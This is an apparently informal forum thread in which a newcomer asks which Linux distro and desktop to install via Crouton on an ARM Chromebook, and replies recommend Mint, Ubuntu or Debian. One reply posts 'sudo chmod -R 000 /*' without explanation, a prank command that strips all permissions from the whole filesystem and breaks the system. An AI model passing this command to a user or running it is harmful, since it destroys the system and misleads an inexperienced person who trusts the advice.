Hi! I'm in the process of installing Linux on my Samsung Chromebook using Crouton. I am new to Linux and unsure which distro and desktop environment to go with? What I'm looking for is a clean, nice looking OS.

Please help me out, thanks!

I should add, it's an ARM based Chromebook.

For beginners I always recommend an Ubuntu fork called Mint with cinnamon. Mint is pretty beginner friendly, and cinnamon is a nice interface.

Not that' Debian is bad or anything, in fact some may recommend it to you.

Let's say I want the GNOME interface, should I go for Debian or Ubuntu? (Or Kali which I don't even understand what it is?)

Hmm for an arm notebook I suggest ubuntu, it's the distro that gets the most support for that architecture from what I know. Either way it costs you nothing to try both, I haven't really tried the arm version of either os. Personally I like ubuntu, although I kind of preferred the gnome interface I find that unity is just as functional in most occasions.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

If you want to be really technical, Debian, Ubuntu, and Kali are all Debian. >.>

Debian is good for the stability. Ubuntu and variants have improvements. Linux Mint is an excellent and very pretty option.

Don't get Kali, its mainly for security penetration testing and such. (if that flew over your head, its not for you :P)

You can't go wrong with either Debian or Ubuntu, Ubuntu might be better if you haven't used either before though.
